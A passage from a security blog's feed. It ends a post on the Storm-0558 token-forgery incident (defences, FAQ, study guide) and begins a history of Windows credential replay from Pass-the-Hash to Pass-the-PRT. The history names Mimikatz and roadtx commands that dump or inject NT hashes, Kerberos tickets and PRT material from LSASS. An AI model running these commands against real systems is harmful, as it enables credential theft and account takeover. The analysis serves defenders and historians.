&lt;li&gt;&lt;strong&gt;HSM custody for signing keys (M1).&lt;/strong&gt; Generate signing keys inside an HSM with &lt;code&gt;exportable=False&lt;/code&gt;. The HSM signs; the application asks. The key never leaves.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automatic rotation (M3).&lt;/strong&gt; Rotate signing keys on a cadence measured in days to weeks. Publish the new &lt;code&gt;kid&lt;/code&gt; in your JWKS before signing with it; deprecate the old &lt;code&gt;kid&lt;/code&gt; only after relying parties have had time to refresh their JWKS caches.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Issuer and audience enforcement (M4).&lt;/strong&gt; Implement the combined &lt;code&gt;iss&lt;/code&gt; and &lt;code&gt;aud&lt;/code&gt; validation mandate RFC 8725 codifies in Sections 3.8 and 3.9, and &lt;em&gt;test&lt;/em&gt; it with adversarial cross-tenant tokens. Write a test that forges a token from your tenant &lt;code&gt;A&lt;/code&gt; and verifies that your tenant &lt;code&gt;B&lt;/code&gt;&apos;s validator rejects it [@rfc-8725; @rfc-8725-html].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;code&gt;kid&lt;/code&gt; drift monitoring (M7).&lt;/strong&gt; Alert on JWT validation events whose &lt;code&gt;kid&lt;/code&gt; is not currently published in your issuer&apos;s JWKS. A forged token signed with a retired or unpublished &lt;code&gt;kid&lt;/code&gt; will surface here.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;JWKS cache invalidation discipline.&lt;/strong&gt; Relying parties cache JWKS aggressively. Coordinate rotation with your largest relying parties; document the cache TTL you expect them to honor. OpenID Connect Discovery 1.0 specifies the JWKS discovery pattern but leaves cache TTL as a deployment choice; the publication of that contract is yours to make [@oidc-discovery]. Storm-0558&apos;s lesson is that an unrotated key is a permanent attack surface; a poorly-coordinated rotation is a permanent operational outage.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;An on-call runbook for rotation failure.&lt;/strong&gt; If automatic rotation fails, what is the page severity? Who is paged? How is manual rotation performed? Microsoft&apos;s 2021 pause of MSA manual rotation (after a manual-rotation-related outage) is the cautionary tale; the runbook is the prevention [@csrb-report-2024].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;For higher-value deployments, add Confidential Compute (M2) -- run the signing service inside an attested TEE so that even host operators cannot read the in-use key. The threshold of &quot;higher-value&quot; is whatever value of &quot;your customer&apos;s most sensitive resource accessed by a forged token&quot; makes the in-use observation residual worth closing.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; HSM custody plus automatic rotation plus RFC 8725 Sections 3.8 and 3.9 enforcement plus &lt;code&gt;kid&lt;/code&gt; drift monitoring plus rotation runbook. Add Confidential Compute for the in-use observation residual on high-value paths. Test cross-tenant token rejection adversarially; do not trust your validation library defaults [@rfc-8725; @rfc-8725-html; @sfi-sept-2024].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;11.3 For CISOs evaluating a cloud IdP&lt;/h3&gt;
&lt;p&gt;The four RFP questions, mapped to the four pre-incident failure modes Section 3 catalogued:&lt;/p&gt;
&lt;p&gt;(a) Where is the signing key custodied, and what FIPS certification does the HSM hold?
(b) What is the rotation cadence for the IdP signing keys, and is rotation automated end-to-end?
(c) Does the validation SDK enforce &lt;code&gt;iss&lt;/code&gt;/&lt;code&gt;aud&lt;/code&gt; separation by default, or does it leave the check to the caller?
(d) What audit log events are available to free-tier customers, with what retention, and which events are gated behind paid tiers?&lt;/p&gt;
&lt;p&gt;Map the answers to CSA CCM CEK and IAM domains and FedRAMP High SC-12 and IA-5 controls for cross-vendor normalization [@csa-ccm; @fedramp].&lt;/p&gt;

Ask the vendor: &quot;If your production IdP signing key were stolen today, by what telemetry would you detect it, and within what time? What public-disclosure timeline would you commit to?&quot; The answer reveals more about the vendor&apos;s posture than the answers to the four primary questions, because it forces the vendor to talk about a scenario their marketing material does not.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Defense in depth defeats the &lt;em&gt;plausible&lt;/em&gt; attack mechanisms. Whether it defeats the &lt;em&gt;actual&lt;/em&gt; attack mechanism is unknown because, in the highest-stakes documented case, the actual mechanism is still unknown. The defender&apos;s posture is therefore &quot;raise the floor against everything I can imagine,&quot; not &quot;patch the specific bug.&quot; Storm-0558&apos;s enduring lesson is what it means to architect under that constraint.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The seven SOTA methods raise the floor against plausible mechanisms. The customer can demand documentation, alert on deviations, pay for the audit tier they actually need, and vote with procurement dollars for vendors whose disclosure posture matches Microsoft&apos;s post-CSRB stance. Prevention against a CSP-side custody failure remains, as Section 9 noted, on the CSP side by construction.&lt;/p&gt;
&lt;h2&gt;12. FAQ and Study Guide&lt;/h2&gt;

No. That was Microsoft&apos;s September 6, 2023 working hypothesis. Microsoft itself partially retracted it on March 12, 2024 (see Section 4.1 for the full retraction text in the Callout). The Cyber Safety Review Board report on April 2, 2024 then concluded definitively that Microsoft &quot;has been unable to determine how or when Storm-0558 obtained the MSA key&quot; [@msrc-key-acquisition; @csrb-report-2024].

No. The U.S. State Department detected the breach on June 15, 2023, by reviewing `MailItemsAccessed` events in Microsoft 365 Purview audit logs against a maintained baseline of legitimate application IDs. The State Department notified Microsoft on June 16, 2023. Microsoft then confirmed the forgery by comparing the suspicious tokens&apos; `kid` against its own published MSA key rotation history [@csrb-report-2024; @ms-security-jul14].

Microsoft&apos;s preliminary July 2023 disclosure said &quot;approximately 25&quot; [@msrc-storm0558-jul11]. The CSRB&apos;s April 2024 final tally is 22 enterprise organizations and approximately 503 related personal accounts, with approximately 60,000 emails exfiltrated from 10 U.S. State Department accounts alone [@csrb-report-2024].

The attack pattern -- steal an identity provider&apos;s signing key, mint forged tokens, present them to relying parties -- is generic and has prior public examples (Reiner&apos;s 2017 Golden SAML disclosure; the Russian SVR&apos;s 2020 Sunburst weaponization). What is Microsoft-specific is the *cross-tier* consumer/enterprise validation flaw and the unrotated 2016 key. No other major identity provider has publicly disclosed an analogous IdP-signing-key-class incident in the 2023-2026 window, but absence of public disclosure is not absence of risk [@reiner-golden-saml; @aa20-352a; @wiz-storm0558].

The Secure Future Initiative (SFI). Identity signing keys for both MSA and Entra ID are now generated, stored, and automatically rotated in Azure Managed HSM (FIPS 140-3 Level 3) as of the September 2024 progress report. The MSA signing service runs inside Azure Confidential VMs as of April 2025, with Entra ID&apos;s signing service migrating to the same. 90% of Entra ID tokens for Microsoft apps are validated by one consistent hardened identity SDK that enforces `iss`/`aud` separation. And `MailItemsAccessed` plus 30+ Purview audit event classes have been free for FCEB and most commercial customers since the September 2023 rollout, with default retention now 180 days and internal retention extended to two years [@sfi-sept-2024; @sfi-april-2025; @ms-blog-jul19-recovered].

Yes, in principle. Wiz Research&apos;s independent analysis demonstrated the compromised key could have signed tokens for any application using Microsoft&apos;s converged OpenID v2.0 endpoint that accepts personal-account authentication -- SharePoint, Teams, OneDrive, and a long tail of third-party &quot;Sign in with Microsoft&quot; applications. There is no public evidence the broader scope was actually exploited; the publicly documented victims are scoped to Exchange Online and Outlook. Whether broader exploitation occurred and was simply not detected against telemetry that did not exist remains an open question [@wiz-storm0558].

Because it inverts a default assumption. Cloud providers, in their marketing material, are the parties responsible for monitoring their own identity infrastructure. In Storm-0558, the cloud provider did not. A paying customer with a paid-tier audit log saw the anomaly first. The CSRB&apos;s harshest single critique is structural: the commercial logging-tier structure of cloud identity asymmetrically delays detection in favor of well-resourced customers, and the policy response (free Purview Audit features) is a partial but necessary correction [@csrb-report-2024; @cisa-statement-free-logs-fixed].
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;storm-0558-the-outlook-consumer-signing-key-that-forged-government-email&quot; keyTerms={[
  { term: &quot;Storm-0558&quot;, definition: &quot;Microsoft&apos;s taxonomy name (Apr 2023) for the China-affiliated actor responsible for the Summer 2023 MSA-key compromise; renamed Antique Typhoon in Aug 2024.&quot; },
  { term: &quot;MSA issuer&quot;, definition: &quot;Microsoft Account, Microsoft&apos;s consumer identity provider. Its v2.0 OpenID Connect issuer is &lt;code&gt;login.microsoftonline.com/9188040d-6c67-4c5b-b112-36a304b66dad/v2.0&lt;/code&gt; -- the MSA &apos;consumers&apos; tenant on the shared login.microsoftonline.com host (per the live OIDC discovery document at login.microsoftonline.com/consumers/v2.0/.well-known/openid-configuration).&quot; },
  { term: &quot;Entra ID issuer&quot;, definition: &quot;Microsoft&apos;s enterprise identity provider (formerly Azure AD), signing tokens for tenant-scoped workforce identities at &lt;code&gt;login.microsoftonline.com/{enterprise-tenant-GUID}/v2.0&lt;/code&gt; on the same login.microsoftonline.com host as MSA but with a different tenant GUID.&quot; },
  { term: &quot;JWT (JSON Web Token)&quot;, definition: &quot;Compact URL-safe token format with header, payload, and signature; RFC 8725 codifies Best Current Practices for validation.&quot; },
  { term: &quot;kid (Key ID)&quot;, definition: &quot;Identifier in a JWT header naming the public key (in the issuer&apos;s JWKS) used to verify the signature.&quot; },
  { term: &quot;Golden SAML&quot;, definition: &quot;2017 forgery technique (Reiner / CyberArk Labs) using a stolen AD FS Token-Signing key to mint SAML assertions; MITRE T1606.002.&quot; },
  { term: &quot;MailItemsAccessed&quot;, definition: &quot;Microsoft 365 Purview audit event recording every mailbox-item read, including AppID, ClientAppID, and source IP.&quot; },
  { term: &quot;Purview Audit (Premium)&quot;, definition: &quot;Microsoft 365 audit tier that, pre-Sep 2023, gated MailItemsAccessed and other high-value security events behind a paid add-on.&quot; },
  { term: &quot;Cyber Safety Review Board (CSRB)&quot;, definition: &quot;Federal advisory board established by EO 14028 (May 2021); published the Storm-0558 review on April 2, 2024.&quot; },
  { term: &quot;Secure Future Initiative (SFI)&quot;, definition: &quot;Microsoft corporate program (launched Nov 2, 2023) to address the CSRB-identified failure modes; six pillars announced May 3, 2024.&quot; },
  { term: &quot;Azure Managed HSM&quot;, definition: &quot;FIPS 140-3 Level 3 hardware security module service on Marvell LiquidSecurity; custodies MSA and Entra ID signing keys post-SFI.&quot; },
  { term: &quot;Confidential Computing (TEE)&quot;, definition: &quot;Hardware-isolated VM execution environment (AMD SEV-SNP or Intel TDX) that encrypts memory and CPU state against host-operator access; hosts the MSA signing service post-Apr 2025.&quot; },
  { term: &quot;EUF-CMA&quot;, definition: &quot;Existential unforgeability under chosen-message attack; the standard cryptographic security notion for digital signatures.&quot; },
  { term: &quot;RFC 8725&quot;, definition: &quot;JSON Web Token Best Current Practices (IETF, February 2020). Section 3.8 codifies mandatory issuer validation; Section 3.9 codifies mandatory audience validation. The combined check is what Storm-0558&apos;s relying party did not perform.&quot; }
]} questions={[
  { q: &quot;Why is it accurate to say Microsoft did not &apos;cause&apos; Storm-0558 in a single failure, even though the CSRB called it &apos;preventable&apos;?&quot;, a: &quot;The pre-incident architecture failed in four independently-decided ways at once: an unrotated 2016 MSA signing key; software-resident custody for that key; a 2018 converged metadata endpoint whose validation library left iss/aud enforcement to callers; and a 2022 OWA migration onto that endpoint without the iss/aud check. Each decision was made for an independent reason and was defensible in isolation. The &apos;preventable&apos; framing applies to the *aggregate*: any one of the four, fixed in isolation, would have prevented the incident. The CSRB called the security culture &apos;inadequate&apos; precisely because none of the four was fixed before all four aligned.&quot; },
  { q: &quot;What is the difference between the State Department&apos;s detection on June 15, 2023 and Microsoft&apos;s identification on June 16, 2023?&quot;, a: &quot;June 15 was the State Department SOC analyst&apos;s discovery of an anomalous ClientAppID in MailItemsAccessed events. June 16 was Microsoft&apos;s notification by the State Department. Microsoft&apos;s July 14 blog uses &apos;June 16&apos; because that is when Microsoft itself was informed; the CSRB report disambiguates and uses both dates correctly.&quot; },
  { q: &quot;Why does the architectural response (SFI) emphasize defense in depth rather than fixing one specific bug?&quot;, a: &quot;Because the actual key-acquisition mechanism is unknown. Microsoft&apos;s September 2023 crash-dump hypothesis was partially retracted in March 2024, and the April 2024 CSRB report confirmed Microsoft cannot determine how the key was stolen. SFI therefore raises the floor against the plausible mechanism categories (in-memory exposure, debugging-environment leakage, compromised engineering credentials reaching key material) rather than patching a specific code path.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>storm-0558</category><category>cloud-identity</category><category>token-forgery</category><category>csrb</category><category>oidc</category><category>jwt</category><category>incident-response</category><category>secure-future-initiative</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Pass-the-Hash to Pass-the-PRT: Twenty-Nine Years of Windows Credential Replay in One Family Tree</title><link>https://paragmali.com/blog/pass-the-hash-to-pass-the-prt-twenty-nine-years-of-windows-c/</link><guid isPermaLink="true">https://paragmali.com/blog/pass-the-hash-to-pass-the-prt-twenty-nine-years-of-windows-c/</guid><description>Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Pass-the-Certificate, and Pass-the-PRT are one architectural lineage. Each defense bought years; none closed the family.</description><pubDate>Thu, 28 May 2026 00:00:00 GMT</pubDate><content:encoded>
Twenty-nine years of Windows credential-replay attacks -- Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, Pass-the-Certificate, Pass-the-PRT -- are a single lineage, not five techniques. Each generation finds the next long-term authentication artefact that lives outside the latest Microsoft isolation boundary, then commoditises extraction in tooling that runs anywhere with local administrator. Credential Guard (2015) and KB5014754 (2022) bought years but not closure; Pass-the-PRT (Mollema + Delpy, 2020) already defeats both because the Primary Refresh Token lives in the CloudAP plug-in, which is not inside any current isolation scope. The next decade of Windows credential theft turns on whether Microsoft extends hypervisor-based isolation to CloudAP before commodity offensive tooling makes the attack universal.
&lt;h2&gt;1. Two Afternoons, Twenty-Nine Years Apart&lt;/h2&gt;
&lt;p&gt;On the afternoon of Tuesday, April 8, 1997, between 5:27 p.m. and 8:57 p.m. -- a window we can narrow to about three and a half hours from the file timestamps preserved in the patch he posted -- a researcher named Paul Ashton sat down with the Samba source tree and made the smallest possible change to &lt;code&gt;smbclient&lt;/code&gt;.The bracketing mtimes &lt;code&gt;Tue Apr  8 17:27:29 1997&lt;/code&gt; and &lt;code&gt;Tue Apr  8 20:57:43 1997&lt;/code&gt; are preserved verbatim in the unified diff&apos;s &lt;code&gt;***&lt;/code&gt; and &lt;code&gt;---&lt;/code&gt; header lines on Exploit-DB advisory 19197 [@ashton-exploitdb-19197]. You can still download the diff today and confirm the timestamps yourself. Where the unpatched client computed a network response from a typed-in password, his version read the password&apos;s LM hash from &lt;code&gt;smbpasswd&lt;/code&gt; on disk and fed it straight to the same encryption primitive, skipping the password entirely.&lt;/p&gt;
&lt;p&gt;He posted the diff to NTBugtraq the same evening with a five-line advisory: &quot;A modified SMB client can mount shares on an SMB host by passing the username and corresponding LanMan hash of an account that is authorized to access the host and share. The modified SMB client removes the need for the user to &apos;decrypt&apos; the password hash into its clear-text equivalent.&quot; [@ashton-exploitdb-19197]&lt;/p&gt;
&lt;p&gt;Twenty-nine years later, every Windows credential-replay attack in commodity offensive tooling is a direct descendant of that afternoon.&lt;/p&gt;
&lt;p&gt;Fast-forward to 2026. A Windows 11 23H2 laptop, hardened to Microsoft&apos;s published baseline. &lt;a href=&quot;https://paragmali.com/blog/the-empty-hash-credential-guard-the-lsaiso-trustlet-and-the-/&quot; rel=&quot;noopener&quot;&gt;Credential Guard&lt;/a&gt; on. KB5014754 strong certificate mapping in full enforcement. Conditional Access enabled, with Token Protection where supported. An attacker has local admin -- the same starting position the 1997 attack assumed.&lt;/p&gt;
&lt;p&gt;Two commands run on that machine, in the same paragraph. Mimikatz &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; returns empty NT hash and TGT buffers; Credential Guard has done its job. Then Mimikatz &lt;code&gt;dpapi::cloudapkd /unprotect&lt;/code&gt; returns a valid Primary Refresh Token session key and proof-of-possession material [@mollema-prt-digging]. On a &lt;em&gt;different&lt;/em&gt; machine across the internet, the attacker pastes that material into Dirk-jan Mollema&apos;s &lt;code&gt;roadtx prt&lt;/code&gt;, mints an &lt;code&gt;x-ms-RefreshTokenCredential&lt;/code&gt; cookie, and authenticates to Entra ID as the laptop&apos;s user [@mollema-prt-abusing] [@roadtools-github]. Every Microsoft defense shipped in 2015, 2022, and 2024 is running. The attack still wins.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The empty buffer from &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; is the artefact of twenty-nine years of architectural lessons. The PRT extraction from &lt;code&gt;dpapi::cloudapkd&lt;/code&gt; is the architecture of the &lt;em&gt;next&lt;/em&gt; five-to-ten years. Both scenes are the same attack class. The credential changed; the protocol that consumes it changed; the long-term storage location changed; the lineage did not.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;You will meet seven people in this article. Paul Ashton (1997, the patch). Hernan Ochoa (2008, the toolkit that put the technique inside Windows itself). Benjamin Delpy (2011, Mimikatz; and the Kerberos generations that followed). Sean Metcalf (2014, who named Overpass-the-Hash and wrote the practitioner reference that taught a generation of red and blue teams).&lt;/p&gt;
&lt;p&gt;Will Schroeder and Lee Christensen (2021, &quot;Certified Pre-Owned,&quot; the AD CS catalog that became Pass-the-Certificate). Oliver Lyak (2022, Certifried, the CVE that forced Microsoft to ship KB5014754). And Dirk-jan Mollema (2020, the Primary Refresh Token research this article argues is the most consequential credential-theft work since 2008). The cast is small. The lineage they built is the load-bearing structure of every Windows penetration test in 2026.&lt;/p&gt;
&lt;p&gt;How is it possible that the same attack works in 1997 and 2026? The answer is structural, not coincidental -- and once you see it, you cannot unsee it.&lt;/p&gt;
&lt;h2&gt;2. The Architectural Property the Family Shares&lt;/h2&gt;
&lt;p&gt;NTLM authentication never asks for the password as a string. It asks for a function of the hash. The hash &lt;em&gt;is&lt;/em&gt; the password.&lt;/p&gt;
&lt;p&gt;That sentence is the article&apos;s load-bearing claim, and the rest of this section is its proof.&lt;/p&gt;
&lt;p&gt;The Microsoft specification for the NTLM protocol -- &lt;code&gt;[MS-NLMP]&lt;/code&gt;, sections 3.3.1 and 3.3.2 -- writes the response computation in pseudocode. For NTLMv1, the server sends an 8-byte challenge; the client computes &lt;code&gt;NtChallengeResponse = DESL(ResponseKeyNT, challenge)&lt;/code&gt;, where &lt;code&gt;ResponseKeyNT = NTOWFv1(password) = MD4(UNICODE(password))&lt;/code&gt; [@ms-nlmp-3-3-1]. &lt;code&gt;DESL&lt;/code&gt; is a variant of DES that pads the 16-byte NT hash to 21 bytes with five zero bytes, splits the result into three 7-byte sub-keys, runs DES on the 8-byte challenge under each sub-key, and concatenates the three 8-byte ciphertexts to form a 24-byte response.&lt;/p&gt;
&lt;p&gt;NTLMv2 is more elaborate -- the response key is &lt;code&gt;NTOWFv2 = HMAC_MD5(MD4(UNICODE(password)), UNICODE(Uppercase(User) + UserDom))&lt;/code&gt;, and the proof string is &lt;code&gt;HMAC_MD5&lt;/code&gt; of the challenge concatenated with a target-info structure -- but the structural property is identical: the cleartext password appears in exactly one place in the entire protocol, the input to the hash function on the client. The verifier performs the same computation against the stored NT hash from the SAM or NTDS.dit, and compares. Neither side ever transmits the password [@ms-nlmp-3-3-2].&lt;/p&gt;
&lt;p&gt;This is what Microsoft means when its institutional documentation says Pass-the-Hash &quot;cannot be patched at the protocol level.&quot; There is nothing to patch.The same property holds for any challenge-response protocol whose verifier stores a determinable function of the password rather than the password itself: Kerberos with stored long-term keys, CHAP with shared secrets, OAuth client_credentials with shared secrets, every HMAC-based proof-of-possession scheme.&lt;/p&gt;
&lt;p&gt;The protocol takes a stored hash and produces a response. Swap the user&apos;s hash for the attacker&apos;s hash, and the protocol still produces a valid response, signed by the substituted key. The bug is not a bug; it is a documented property.&lt;/p&gt;

A family of Windows authentication protocols (NTLMv1 and NTLMv2) in which a server sends a random challenge and the client returns a response computed by applying a keyed cryptographic primitive (DES or HMAC-MD5) to that challenge under a key derived from the user&apos;s password. The verifier holds the same key and recomputes the response to confirm. The cleartext password is never transmitted [@ms-nlmp-3-3-1] [@ms-nlmp-3-3-2].

The 16-byte MD4 of the user&apos;s password as UTF-16 little-endian (`MD4(UNICODE(Passwd))` in the NLMP pseudocode). Unsalted by design, because NT was originally specified for an offline domain controller that has to verify against a fixed reference value. The NT hash is the long-term symmetric Windows authentication secret for every account, stored locally in the SAM and centrally in the NTDS.dit Active Directory database [@ms-nlmp-3-3-1].

The technique of authenticating to a service that uses NTLM (or any protocol descended from the same family) by feeding a stolen NT hash directly to the response-construction function, instead of typing a password the function would then hash. The terminology and the first working demonstration are due to Paul Ashton, NTBugtraq, April 1997 [@ashton-exploitdb-19197].

sequenceDiagram
    participant Client
    participant Server
    participant Verifier as SAM or NTDS.dit
    Client-&amp;gt;&amp;gt;Server: NTLM_NEGOTIATE
    Server-&amp;gt;&amp;gt;Client: NTLM_CHALLENGE with 8-byte nonce
    Note over Client: ResponseKeyNT equals NTOWFv1 of stored NT hash
    Note over Client: NtChallengeResponse equals DESL of ResponseKeyNT and nonce
    Client-&amp;gt;&amp;gt;Server: NTLM_AUTHENTICATE with response
    Server-&amp;gt;&amp;gt;Verifier: Look up stored NT hash for user
    Verifier--&amp;gt;&amp;gt;Server: Stored NT hash
    Note over Server: Recompute DESL of stored hash and nonce
    Server-&amp;gt;&amp;gt;Client: Authentication succeeds if responses match
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The hash is the password. Any long-term authentication artefact reachable by the process that uses it is replayable -- and every credential type the rest of this article discusses (Kerberos TGT, certificate private key, Primary Refresh Token session key) is a different instance of this same property. Defenses can isolate one artefact at a time; the property is intrinsic to the architecture.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ashton&apos;s 1997 patch was the protocol-disclosure proof. He swapped a single function call -- &lt;code&gt;SMBencrypt(pass, cryptkey, pword)&lt;/code&gt; became &lt;code&gt;E_P24(p21, cryptkey, pword)&lt;/code&gt;, where &lt;code&gt;p21&lt;/code&gt; is the user&apos;s LM hash read directly from &lt;code&gt;smbpasswd&lt;/code&gt; -- and Samba&apos;s &lt;code&gt;smbclient&lt;/code&gt; authenticated to NT 3.51 and NT 4.0 file servers without ever knowing the user&apos;s password [@ashton-exploitdb-19197]. You can read the patch in five minutes. It is also, in a precise sense, the first proof that NTLM&apos;s response computation is hash-equivalent: if substituting the hash works, then mathematically the hash is what the protocol wanted all along.&lt;/p&gt;
&lt;p&gt;And then nothing happened for eleven years.&lt;/p&gt;
&lt;p&gt;That gap deserves its own explanation, because the eleven-year interregnum is the cleanest failure mode in the lineage.&lt;/p&gt;
&lt;p&gt;Wikipedia&apos;s modern summary of the pre-2008 limitation reads: &quot;even after performing NTLM authentication successfully using the pass the hash technique, tools like Samba&apos;s SMB client might not have implemented the functionality the attacker might want to use. This meant that it was difficult to attack Windows programs that use DCOM or RPC. Also, because attackers were restricted to using third-party clients when carrying out attacks, it was not possible to use built-in Windows applications, like Net.exe or the Active Directory Users and Computers tool amongst others, because they asked the attacker or user to enter the cleartext password to authenticate, and not the corresponding password hash value.&quot; [@wikipedia-pass-the-hash]&lt;/p&gt;

Inside Microsoft the 1997 patch was treated as confirming a known property of LSASS-resident credentials, not as a new attack class. The institutional position was that any compromise yielding the hash already implied SYSTEM-equivalent access, and that the realistic chain was &quot;exfiltrate the hash and crack it offline,&quot; not &quot;replay the hash.&quot; The architectural counter-claim -- that *replaying* the hash from inside a Windows process bypasses every native-tool obstacle -- took a decade to land in the practitioner literature. The 2012 Duckwall + Campbell Black Hat USA paper named the lag in its title: &quot;Still Passing the Hash 15 Years Later.&quot; [@duckwall-campbell-bh2012]
&lt;p&gt;If the obstacle is &quot;built-in Windows tools ask for cleartext,&quot; the architectural answer is to put the substituted hash &lt;em&gt;inside&lt;/em&gt; the Windows process that those tools rely on. That insight took eleven years to operationalise. The person who operationalised it was Hernan Ochoa, in 2008.&lt;/p&gt;
&lt;h2&gt;3. From Patch to Toolkit: The Windows-Native Pivot&lt;/h2&gt;
&lt;p&gt;By 2008, Ashton&apos;s 1997 patch had been sitting on NTBugtraq for eleven years. Hernan Ochoa had a different idea: instead of patching the client, patch the &lt;em&gt;credential cache&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The artefact Ochoa shipped at CanSecWest 2008 and Black Hat USA 2008 was called the &lt;em&gt;Pass-the-Hash Toolkit&lt;/em&gt;, distributed through Core Security Technologies&apos; open-source projects page [@corelabs-pshtoolkit-wayback]. It contained two principal executables. &lt;code&gt;whosthere.exe&lt;/code&gt; read the NTLM credentials cached in LSASS for the active logon sessions, and &lt;code&gt;iam.exe&lt;/code&gt; opened the LSASS process with &lt;code&gt;PROCESS_VM_WRITE&lt;/code&gt;, located the cached credential block for the current interactive logon session, and overwrote the username, domain, and NT hash fields with attacker-supplied values in place (a companion &lt;code&gt;genhash.exe&lt;/code&gt; computed hashes).&lt;/p&gt;
&lt;p&gt;Once the substitution was in place, every native Windows SSO consumer -- &lt;code&gt;net.exe&lt;/code&gt;, &lt;code&gt;wmic&lt;/code&gt;, &lt;code&gt;mstsc&lt;/code&gt; once Restricted Admin RDP shipped years later, SMB, RPC, DCOM -- transparently picked up the attacker-supplied hash, because the OS handed them what it believed were the legitimate user&apos;s credentials.&lt;/p&gt;
&lt;p&gt;Wikipedia summarises the architectural pivot in one paragraph: &quot;It allowed the user name, domain name, and password hashes cached in memory by the Local Security Authority to be changed at runtime &lt;em&gt;after&lt;/em&gt; a user was authenticated -- this made it possible to &apos;pass the hash&apos; using standard Windows applications, and thereby to undermine fundamental authentication mechanisms built into the operating system.&quot; [@wikipedia-pass-the-hash] The eleven-year limitation was gone. Pass-the-Hash was now a Windows-native attack that worked against any tool that read its credentials from LSASS -- which in practice meant &lt;em&gt;every&lt;/em&gt; Windows tool.&lt;/p&gt;

The user-mode Windows process (`lsass.exe`) that handles interactive logon, owns the Security Reference Monitor&apos;s policy decisions, and -- relevant to this article -- caches the in-memory credential material that supports Single Sign-On for the duration of each logon session: NT hashes for NTLM, Kerberos TGTs and session keys, certificate handles, and (since Azure AD / Entra ID device join) Primary Refresh Token material in the CloudAP plug-in. Every credential-replay technique in this article reaches its target by reading LSASS in some form.
&lt;p&gt;The 2012 retrospective is where the security industry stopped pretending Pass-the-Hash was solved. Alva Duckwall and Christopher Campbell shipped a Black Hat USA 2012 paper titled, unambiguously, &quot;Still Passing the Hash 15 Years Later.&quot; [@duckwall-campbell-bh2012] The title is the load-bearing pull-quote: it named Ashton 1997 as the origin, Ochoa 2008 as the Windows-native pivot, and the industry&apos;s continued failure to ship a structural fix as the central fact. From this point onwards Microsoft itself acknowledged Pass-the-Hash as a structural property of NTLM rather than a fixable bug.&lt;/p&gt;
&lt;p&gt;Hernan Ochoa&apos;s Windows Credentials Editor (WCE), released a year after the Pass-the-Hash Toolkit, developed the same LSASS-injection primitive on a separate code base. Two independent implementations converging on the same memory-access pattern in the same window is the clearest indication that the architectural insight -- &quot;the credential is sitting in a process you can write to&quot; -- was overdetermined once anyone went looking for it.&lt;/p&gt;
&lt;p&gt;What did Ashton&apos;s 1997 patch leave on the table? The other long-term credentials that LSASS held. The NT hash was the first. There would be more.&lt;/p&gt;
&lt;p&gt;If you can read the NT hash from LSASS, you can read the Kerberos TGT from LSASS. The same memory-access primitive that animates &lt;code&gt;IAM.EXE&lt;/code&gt; is one commit away from animating &lt;code&gt;sekurlsa::tickets&lt;/code&gt;. That commit shipped in May 2011. Its author was a twenty-five-year-old French programmer named Benjamin Delpy.&lt;/p&gt;
&lt;h2&gt;4. Mimikatz and the Kerberos Turn&lt;/h2&gt;
&lt;p&gt;In May 2011, Benjamin Delpy posted his first public release of a program he had been writing as a side project to learn C. He was twenty-five, working as an IT manager at an institution he has never publicly named. Andy Greenberg&apos;s Wired profile records the date: &quot;He released it publicly in May 2011, but as a closed source program.&quot; [@wired-greenberg-mimikatz] Wikipedia corroborates: &quot;He released the first version of the software in May 2011 as closed source software.&quot; [@wikipedia-mimikatz] The program was called Mimikatz.&lt;/p&gt;
&lt;p&gt;What made Mimikatz architecturally different from Ochoa&apos;s toolkit was that it was &lt;em&gt;modular&lt;/em&gt;. The credential-extraction primitives lived in named command groups: &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt; dumped NT hashes from LSASS; &lt;code&gt;sekurlsa::tickets&lt;/code&gt; dumped Kerberos tickets from LSASS; &lt;code&gt;kerberos::ptt&lt;/code&gt; injected a stolen ticket into the current Kerberos cache via the documented &lt;code&gt;LsaCallAuthenticationPackage&lt;/code&gt; API with the &lt;code&gt;KerbSubmitTicketMessage&lt;/code&gt; message [@ms-lsa-call-auth-package]; &lt;code&gt;lsadump::dcsync&lt;/code&gt; (added August 2015, in collaboration with Vincent Le Toux) impersonated a domain controller and asked another DC for the krbtgt hash via the IDL_DRSGetNCChanges replication RPC [@adsec-dcsync-p1729].&lt;/p&gt;
&lt;p&gt;Same LSASS, different artefact, different protocol surface. The architectural property section 2 named had two artefacts to work with on Windows: the NT hash, and the Kerberos TGT.&lt;/p&gt;
&lt;p&gt;This is &lt;strong&gt;Pass-the-Ticket&lt;/strong&gt; (Generation 2). The stolen TGT plus its session key authenticates the holder as the original principal for the ticket&apos;s lifetime, which on a default AD deployment is ten hours, renewable for seven days. Time complexity per replay: O(1). The TGT session key is the load-bearing piece -- without it, the ticket is opaque encrypted bytes that the holder cannot decrypt, sign, or present back to the KDC. Mimikatz&apos;s &lt;code&gt;sekurlsa::tickets /export&lt;/code&gt; writes the ticket as a &lt;code&gt;.kirbi&lt;/code&gt; file on disk; &lt;code&gt;kerberos::ptt &amp;lt;file&amp;gt;&lt;/code&gt; re-injects on any machine where the user has a Kerberos credentials cache.&lt;/p&gt;

